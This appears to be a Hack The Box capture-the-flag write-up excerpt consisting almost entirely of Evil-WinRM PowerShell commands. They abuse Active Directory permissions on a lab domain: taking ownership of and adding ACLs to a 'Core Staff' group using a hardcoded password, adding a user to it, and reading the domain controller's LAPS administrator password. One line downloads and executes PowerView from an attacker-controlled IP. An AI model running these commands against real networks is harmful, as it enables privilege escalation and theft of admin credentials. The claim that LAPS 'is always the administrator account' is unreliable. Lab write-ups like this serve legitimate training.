Administrator/Martin | Hack The Box

*Evil-WinRM* PS C:\Users\nikk37\Documents> PowerView.ps1
*Evil-WinRM* PS C:\Users\nikk37\Documents> $pwd = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\nikk37\Documents> $cred = New-Object System.Management.Automation.PSCredential('streamio.htb\JDGodd', $pwd)
*Evil-WinRM* PS C:\Users\nikk37\Documents> Set-DomainObjectOwner -Identity 'Core Staff' -OwnerIdentity JDGodd -Cred $cred
*Evil-WinRM* PS C:\Users\nikk37\Documents> Add-DomainObjectAcl -TargetIdentity 'Core Staff' -PrincipalIdentity JDGodd -Cred $cred
*Evil-WinRM* PS C:\Users\nikk37\Documents> Add-DomainGroupMember -Identity 'Core Staff' -Members Nikk37 -cred $cred

LAPS is always the administrator account

*Evil-WinRM* PS C:\Users\nikk37\Documents> IEX(IWR http://10.10.14.6/PowerView.ps1 -UseBasicParsing)
*Evil-WinRM* PS C:\Users\nikk37\Documents> Get-DomainObject DC -Properties "ms-mcs-AdmPwd",name

Last updated 8 months ago

Was this helpful?